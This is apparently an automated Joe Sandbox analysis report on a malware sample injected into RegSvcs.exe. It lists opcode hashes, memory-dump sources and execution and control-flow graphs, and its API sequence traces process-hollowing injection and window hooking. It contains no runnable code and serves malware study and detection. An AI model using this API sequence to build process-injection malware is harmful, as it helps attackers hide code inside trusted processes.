                                                                                          • Instruction ID: 85bd371e7a67988f63916969cbe3f750d8261ffb05ac6817c15d0940fc0031dd
                                                                                          • Opcode Fuzzy Hash: b5acfc4a9bc4a1195686de8ae0856995629e81f575e2b45c9384f07bce1043c1
                                                                                          • Instruction Fuzzy Hash: DED1B334B093448FD706DB78D958A5A7BF2EF86304F1580A6E549CB3A6EB34DC06CB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 09a82e92e2d85262740b64f55b7d5623ce0b21920d85011163f0ce370daa29ed
                                                                                          • Instruction ID: 48e45c18c85378e16380eaa003d61963c37fd5cebeab7e30162158f7b4fc4865
                                                                                          • Opcode Fuzzy Hash: 09a82e92e2d85262740b64f55b7d5623ce0b21920d85011163f0ce370daa29ed
                                                                                          • Instruction Fuzzy Hash: 54812A307141644FEF2567B8EA4836F37D6DB8A314F1144A6E50AD7797CB28CC8693A3
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1af5b08ca779045dd48f0f586cf6b10c94a2a944dee02a264ea7bbfbd4f1391f
                                                                                          • Instruction ID: a1b08c134cba64051f5fe37cfc60ca548bd78bb3e87a8becc40de2c4cee92f19
                                                                                          • Opcode Fuzzy Hash: 1af5b08ca779045dd48f0f586cf6b10c94a2a944dee02a264ea7bbfbd4f1391f
                                                                                          • Instruction Fuzzy Hash: 496108347200685BEF2477A8EA4836F369ADB89311F118476E50EE7786CF28CC8553A3
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 436f736e82f61fdae5231b6be73397f831887fdff25f98afc025742d40520ee3
                                                                                          • Instruction ID: bc6c565e962c0693f150b22f721aceed62a7884e9efcae0e52bc141c8b21ec83
                                                                                          • Opcode Fuzzy Hash: 436f736e82f61fdae5231b6be73397f831887fdff25f98afc025742d40520ee3
                                                                                          • Instruction Fuzzy Hash: 4961E570F2A3809FC716A774646521D7FE29F82204B5A94EAC146CB797EF3CDD068392
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab80ef384a11455013f8b805a909e44707148e129439963dc3190173ac9b8087
                                                                                          • Instruction ID: cbab4a28efc14e82b762a4d33557487e0164931f6a5f970119dc2b93bf9dc94f
                                                                                          • Opcode Fuzzy Hash: ab80ef384a11455013f8b805a909e44707148e129439963dc3190173ac9b8087
                                                                                          • Instruction Fuzzy Hash: 51416231F213105BCB58BBB8606A22F61C79FC5254B16E838D14ACB79AEF7CCD024386
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bf82241aae237dec09169a6764c6cb4aecb5df76a318b558d19ddfee8510dcf
                                                                                          • Instruction ID: ef67045616c2e2ff635b366dcf4eacad666a9124127581a7d0c609b5d78745b4
                                                                                          • Opcode Fuzzy Hash: 5bf82241aae237dec09169a6764c6cb4aecb5df76a318b558d19ddfee8510dcf
                                                                                          • Instruction Fuzzy Hash: 5841E430A10214CFCB15BB78E5942AE77F6EF88354F108879C44AAB791DF359C56CB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc20fe24db37d2d2a5990428d832d38b4a5c97517fe867116c441d4fe7462c47
                                                                                          • Instruction ID: d6ee5ed641e446bc8fcd5204faf1e435390f5cd72b841db921f737e07597876c
                                                                                          • Opcode Fuzzy Hash: fc20fe24db37d2d2a5990428d832d38b4a5c97517fe867116c441d4fe7462c47
                                                                                          • Instruction Fuzzy Hash: 4341A438B001049FCB44DF68D998E59BBF2AF88714B6680A8E90ADB771CB31EC41CF40
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000064619.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_10d000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e3398272c39a948b169138a2424a94aa390871813123fc210a983c47081284a
                                                                                          • Instruction ID: 78da74868b2b3cebd90601b87ae40c3c2d0cb9c7cfa702d9759e1886b8f11205
                                                                                          • Opcode Fuzzy Hash: 2e3398272c39a948b169138a2424a94aa390871813123fc210a983c47081284a
                                                                                          • Instruction Fuzzy Hash: A12103B1504344DFCF15CF94E9C4B2ABF61FB88324F2085A9E9454B286C376D816CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000064619.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_10d000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 457958193833719d9cbea79079a677cdb3eef414a87db96049ed4cca07bae997
                                                                                          • Instruction ID: c44fc4df66f8a09cdb0bfe47a94cfce96271db1c6a2e280b736f733c6307434a
                                                                                          • Opcode Fuzzy Hash: 457958193833719d9cbea79079a677cdb3eef414a87db96049ed4cca07bae997
                                                                                          • Instruction Fuzzy Hash: 29213071604244DFCB19DF54E980B2ABF71FB88328F248169ED454B286C376D846CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000064619.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_10d000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c34041e36760ac2be757d32eacb4820c2675f10f3119b4b838b5f57255b8c280
                                                                                          • Instruction ID: f6294076c241bc2ab735ca571803c05b5857aa31bff97a272061c8b8b7b63158
                                                                                          • Opcode Fuzzy Hash: c34041e36760ac2be757d32eacb4820c2675f10f3119b4b838b5f57255b8c280
                                                                                          • Instruction Fuzzy Hash: 5621AFB6404280DFCB16CF50E9C4B1ABF72FB84314F24C5A9D9444B656C33AD826CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1000064619.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_10d000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction ID: e3350a641e5594698a70ea1db9d88b4ffa337d6ac71a4ae89b28fe45c1f067c3
                                                                                          • Opcode Fuzzy Hash: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction Fuzzy Hash: B011D376404280CFCB16CF54E9C4B1ABF71FB84324F24C6A9DC454B656C376D956CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: afbf249cc783ffe2fd717b1a262c3d16f79949419e83ecbd70f41bc9453c3c56
                                                                                          • Instruction ID: c3a50d2309bba3064a1b4ae8109f075d5adb94fcb8a39b19e38ce9a924373959
                                                                                          • Opcode Fuzzy Hash: afbf249cc783ffe2fd717b1a262c3d16f79949419e83ecbd70f41bc9453c3c56
                                                                                          • Instruction Fuzzy Hash: D211657465D3815FD312673895517353BF59B82700F1680F2E604CB6E7E538DC0A8B51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.1002503375.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_15_2_b20000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5be5816dd6a94415091939b45f3bfd9dab911c9e42b94919821ef5e5c7aa3a7
                                                                                          • Instruction ID: e93ee18cec64c5990f32925fa994baa923bffa4bb1014cc2fb7f2ab70a88992c
                                                                                          • Opcode Fuzzy Hash: d5be5816dd6a94415091939b45f3bfd9dab911c9e42b94919821ef5e5c7aa3a7
                                                                                          • Instruction Fuzzy Hash: 1B0185306006048FCB20BB74E18527EB3E2EFC4214F10887CC09A87B50DF39AC6AC782
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:37.8%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:31
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 1489 262857 1490 262867 1489->1490 1492 2628c0 8 API calls 1490->1492 1491 2628a0 1492->1491 1456 262868 1457 262882 1456->1457 1460 2628c0 1457->1460 1461 262903 1460->1461 1481 263b1d 1461->1481 1485 263b28 1461->1485 1462 2630ea 1473 2648b1 VirtualAllocEx 1462->1473 1474 2648b8 VirtualAllocEx 1462->1474 1463 263443 1477 264660 WriteProcessMemory 1463->1477 1478 264658 WriteProcessMemory 1463->1478 1464 2637ff 1470 264660 WriteProcessMemory 1464->1470 1471 264658 WriteProcessMemory 1464->1471 1465 263851 1467 263961 1465->1467 1469 264000 Wow64SetThreadContext 1465->1469 1466 26353f 1466->1464 1475 264660 WriteProcessMemory 1466->1475 1476 264658 WriteProcessMemory 1466->1476 1472 2649d8 ResumeThread 1467->1472 1468 2628a0 1469->1467 1470->1465 1471->1465 1472->1468 1473->1463 1474->1463 1475->1466 1476->1466 1477->1466 1478->1466 1482 263baf CreateProcessA 1481->1482 1484 263e4f 1482->1484 1486 263baf CreateProcessA 1485->1486 1488 263e4f 1486->1488 1488->1488

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_002619A0 1 Function_00263F2F 2 Function_0026032D 3 Function_00261FAA 4 Function_00261AA8 5 Function_00261A28 6 Function_00263B28 7 Function_00261CA8 8 Function_00261DB4 7->8 46 Function_00262068 7->46 64 Function_00261DC0 7->64 9 Function_00260335 10 Function_002619B0 11 Function_00264530 12 Function_002647B0 13 Function_00260331 14 Function_002648B1 15 Function_0026203A 16 Function_00260238 17 Function_00261A38 18 Function_002648B8 19 Function_002647B8 20 Function_00262805 21 Function_00264000 22 Function_00261C00 23 Function_00260108 24 Function_00262009 25 Function_00261F95 26 Function_00260215 27 Function_0026411C 28 Function_0026021D 29 Function_00263B1D 30 Function_00263F1D 31 Function_00261C98 31->8 31->46 31->64 32 Function_00260698 33 Function_00262698 34 Function_00260219 35 Function_00260167 67 Function_00261A4C 35->67 36 Function_00261867 37 Function_00260065 38 Function_002601E5 39 Function_002605E5 40 Function_00264660 41 Function_00260061 42 Function_002601E1 43 Function_0026006D 44 Function_00261AE8 44->7 44->22 44->31 45 Function_00262868 65 Function_002628C0 45->65 80 Function_002625D8 46->80 47 Function_00261968 48 Function_002600E8 48->47 49 Function_002619E8 50 Function_00260069 51 Function_00260075 52 Function_002602F5 53 Function_00260270 54 Function_00263A70 55 Function_002619F0 56 Function_00260071 57 Function_002627FC 58 Function_002602FD 59 Function_00261978 60 Function_002603F8 61 Function_002602F9 62 Function_002600C7 63 Function_00262043 65->6 65->7 65->14 65->18 65->21 65->22 65->29 65->40 79 Function_002649D8 65->79 81 Function_00264658 65->81 66 Function_002603C0 68 Function_0026024D 69 Function_00260448 70 Function_00262857 70->65 71 Function_00260255 72 Function_00260055 73 Function_002605D5 74 Function_00260350 75 Function_00260251 76 Function_002605DE 77 Function_0026005D 78 Function_002601DD 82 Function_00260059

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 315 263b1d-263bc1 317 263c23-263c4b 315->317 318 263bc3-263bf3 315->318 321 263c4d-263c7a 317->321 322 263caa-263d00 317->322 318->317 326 263bf5-263bfa 318->326 321->322 335 263c7c-263c81 321->335 327 263d02-263d2f 322->327 328 263d5f-263e4d CreateProcessA 322->328 329 263bfc-263c06 326->329 330 263c1d-263c20 326->330 327->328 344 263d31-263d36 327->344 354 263e56-263f3b 328->354 355 263e4f-263e55 328->355 332 263c0a-263c19 329->332 333 263c08 329->333 330->317 332->332 336 263c1b 332->336 333->332 338 263ca4-263ca7 335->338 339 263c83-263c8d 335->339 336->330 338->322 342 263c91-263ca0 339->342 343 263c8f 339->343 342->342 345 263ca2 342->345 343->342 347 263d38-263d42 344->347 348 263d59-263d5c 344->348 345->338 349 263d46-263d55 347->349 350 263d44 347->350 348->328 349->349 352 263d57 349->352 350->349 352->348 367 263f3d-263f41 354->367 368 263f4b-263f4f 354->368 355->354 367->368 371 263f43 367->371 369 263f51-263f55 368->369 370 263f5f-263f63 368->370 369->370 374 263f57 369->374 372 263f65-263f69 370->372 373 263f73-263f77 370->373 371->368 372->373 375 263f6b 372->375 376 263fad-263fb8 373->376 377 263f79-263fa2 373->377 374->370 375->373 381 263fb9 376->381 377->376 381->381
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00263E3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: d1a77da2479c35adbe14606520cc62a3ce05cd58676a09375e087d7b303b7d20
                                                                                          • Instruction ID: 1b24f11f251a97e5ceacbda88e97700dba81e2fd4128821d98068785b9ab637f
                                                                                          • Opcode Fuzzy Hash: d1a77da2479c35adbe14606520cc62a3ce05cd58676a09375e087d7b303b7d20
                                                                                          • Instruction Fuzzy Hash: 44D15870D04259CFDB20CFA8C845BEDBBB1BF49314F0095AAE509B7280DB749A95CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 382 263b28-263bc1 384 263c23-263c4b 382->384 385 263bc3-263bf3 382->385 388 263c4d-263c7a 384->388 389 263caa-263d00 384->389 385->384 393 263bf5-263bfa 385->393 388->389 402 263c7c-263c81 388->402 394 263d02-263d2f 389->394 395 263d5f-263e4d CreateProcessA 389->395 396 263bfc-263c06 393->396 397 263c1d-263c20 393->397 394->395 411 263d31-263d36 394->411 421 263e56-263f3b 395->421 422 263e4f-263e55 395->422 399 263c0a-263c19 396->399 400 263c08 396->400 397->384 399->399 403 263c1b 399->403 400->399 405 263ca4-263ca7 402->405 406 263c83-263c8d 402->406 403->397 405->389 409 263c91-263ca0 406->409 410 263c8f 406->410 409->409 412 263ca2 409->412 410->409 414 263d38-263d42 411->414 415 263d59-263d5c 411->415 412->405 416 263d46-263d55 414->416 417 263d44 414->417 415->395 416->416 419 263d57 416->419 417->416 419->415 434 263f3d-263f41 421->434 435 263f4b-263f4f 421->435 422->421 434->435 438 263f43 434->438 436 263f51-263f55 435->436 437 263f5f-263f63 435->437 436->437 441 263f57 436->441 439 263f65-263f69 437->439 440 263f73-263f77 437->440 438->435 439->440 442 263f6b 439->442 443 263fad-263fb8 440->443 444 263f79-263fa2 440->444 441->437 442->440 448 263fb9 443->448 444->443 448->448
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00263E3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 8a8d6846874c3a3134d3fef21933b3a23ed9cc893ea3258e193a7a2e3bc595b1
                                                                                          • Instruction ID: 71a15164b12718ef2cfb989bbe85ecd2e10468ac8aba0d845bd4e9c33a5177ae
                                                                                          • Opcode Fuzzy Hash: 8a8d6846874c3a3134d3fef21933b3a23ed9cc893ea3258e193a7a2e3bc595b1
                                                                                          • Instruction Fuzzy Hash: 8BD13770D04219CFDB20CFA8C845BEDBBB1BF49314F0095AAE519B7280DB749A95CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 449 264658-2646cb 452 2646e2-264743 WriteProcessMemory 449->452 453 2646cd-2646df 449->453 455 264745-26474b 452->455 456 26474c-26479e 452->456 453->452 455->456
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00264733
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 9ecb8874b24c1cf74070f3071af814ac7b44f071435d2816691bb422ee39e9cd
                                                                                          • Instruction ID: f3cc49c2f48806f2286ddbe41a48b21ed9f85821b00ec4ef45f7344ac8a10331
                                                                                          • Opcode Fuzzy Hash: 9ecb8874b24c1cf74070f3071af814ac7b44f071435d2816691bb422ee39e9cd
                                                                                          • Instruction Fuzzy Hash: C341ABB4D012589FCF00CFA9D984AEEFBF1BB4A314F14942AE814B7210D735AA55CB64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 461 264660-2646cb 463 2646e2-264743 WriteProcessMemory 461->463 464 2646cd-2646df 461->464 466 264745-26474b 463->466 467 26474c-26479e 463->467 464->463 466->467
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00264733
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 500931419ed756e2c2c7498ead138fa5603c5e448cc83570ac7ca04ddad487c2
                                                                                          • Instruction ID: dc0400976931dedc15a28d81539d598fcac3016c323385717b5f981096f6864c
                                                                                          • Opcode Fuzzy Hash: 500931419ed756e2c2c7498ead138fa5603c5e448cc83570ac7ca04ddad487c2
                                                                                          • Instruction Fuzzy Hash: 51419AB4D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7240D775AA55CF54
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 472 2648b1-264972 VirtualAllocEx 475 264974-26497a 472->475 476 26497b-2649c5 472->476 475->476
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00264962
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: c90d8afceab7b975241e7394f626a5c912b3c890c991e160772bed0173423102
                                                                                          • Instruction ID: 1bb59dfe236d23e8c8e81f64a053cb85bc45480f892ce42e9e8443e4dced9402
                                                                                          • Opcode Fuzzy Hash: c90d8afceab7b975241e7394f626a5c912b3c890c991e160772bed0173423102
                                                                                          • Instruction Fuzzy Hash: 9341A7B8D052489FCF00CFA9D884AEEBBB1BF49310F10942AE815BB310D735A955CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 481 2648b8-264972 VirtualAllocEx 484 264974-26497a 481->484 485 26497b-2649c5 481->485 484->485
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00264962
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: fe640aca82800945a9003d40a44e33f3fd12de29ea27a72cab162be45882c4a5
                                                                                          • Instruction ID: 98719cb717cf42c466d0f0257697f45ce0a7031285f825078f66d732a79bf8e1
                                                                                          • Opcode Fuzzy Hash: fe640aca82800945a9003d40a44e33f3fd12de29ea27a72cab162be45882c4a5
                                                                                          • Instruction Fuzzy Hash: B431A6B8D012589FCF00CFA9D884AEEFBB1BB49310F10A42AE815B7300D735A955CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 490 264000-264060 492 264077-2640bf Wow64SetThreadContext 490->492 493 264062-264074 490->493 495 2640c1-2640c7 492->495 496 2640c8-264114 492->496 493->492 495->496
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 002640AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 6bce4596937d612bc1d5f7372119e1a0a7f3aa941dee297aee82b63888267fec
                                                                                          • Instruction ID: 747c39b1cccfc7d9b83ae8d59e0f62cc2378435f7f4aa83e08131387b081e492
                                                                                          • Opcode Fuzzy Hash: 6bce4596937d612bc1d5f7372119e1a0a7f3aa941dee297aee82b63888267fec
                                                                                          • Instruction Fuzzy Hash: C531CDB4D012589FCB14DFA9D884AEEFBF0BF49314F14842AE414B7240D779A989CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 501 2649d8-264a66 ResumeThread 504 264a6f-264ab1 501->504 505 264a68-264a6e 501->505 505->504
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 00264A56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.999247078.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_260000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: ab7e752fd37003c8a60219db8efd133e3939e6136bff54239d8e1684948f7f58
                                                                                          • Instruction ID: aa1c491a7d18fdc3c03fa941191cff7859e285cf4c9d9c57f580dde709db6f2d
                                                                                          • Opcode Fuzzy Hash: ab7e752fd37003c8a60219db8efd133e3939e6136bff54239d8e1684948f7f58
                                                                                          • Instruction Fuzzy Hash: B031CAB4D112189FCB10CFA9D884AAEFBB0BF49314F14942AE815B7300D735A941CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:26.6%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:465
                                                                                          Total number of Limit Nodes:15
                                                                                          execution_graph 34150 3f0448 34151 3f0455 34150->34151 34155 3f5b3d 34151->34155 34160 3f5a99 34151->34160 34152 3f0467 34156 3f5b44 34155->34156 34157 3f5c70 34156->34157 34168 20934d8 34156->34168 34173 20934e8 34156->34173 34157->34152 34161 3f5ac8 34160->34161 34186 3f6244 34161->34186 34191 3f6140 34161->34191 34162 3f5c70 34162->34152 34163 3f5b3b 34163->34162 34166 20934d8 2 API calls 34163->34166 34167 20934e8 2 API calls 34163->34167 34166->34162 34167->34162 34169 2093502 34168->34169 34170 2093546 34169->34170 34178 20936d8 34169->34178 34182 20936d0 34169->34182 34170->34157 34174 2093502 34173->34174 34175 2093546 34174->34175 34176 20936d8 SetWindowsHookExW 34174->34176 34177 20936d0 SetWindowsHookExW 34174->34177 34175->34157 34176->34174 34177->34174 34180 209371c SetWindowsHookExW 34178->34180 34181 2093762 34180->34181 34181->34169 34183 209371c SetWindowsHookExW 34182->34183 34185 2093762 34183->34185 34185->34169 34187 3f6252 34186->34187 34189 3f6149 34186->34189 34188 3f623d 34188->34163 34189->34188 34195 3f636f 34189->34195 34193 3f6149 34191->34193 34192 3f623d 34192->34163 34193->34192 34194 3f636f 22 API calls 34193->34194 34194->34193 34196 3f639f 34195->34196 34197 3f63c7 34196->34197 34234 3f78bf 34196->34234 34244 3f7b42 34196->34244 34252 3f7949 34196->34252 34262 3f7bcf 34196->34262 34270 3f7550 34196->34270 34283 3f75d1 34196->34283 34296 3f765b 34196->34296 34309 3f7c5f 34196->34309 34317 3f7ce3 34196->34317 34325 3f76e5 34196->34325 34338 3f7766 34196->34338 34348 3f79e9 34196->34348 34356 3f74ea KiUserExceptionDispatcher 34196->34356 34369 3f77f0 34196->34369 34379 3f7d73 34196->34379 34387 3f7a73 34196->34387 34395 3f7df7 34196->34395 34403 3f787a 34196->34403 34413 3f7afd 34196->34413 34421 3f7904 34196->34421 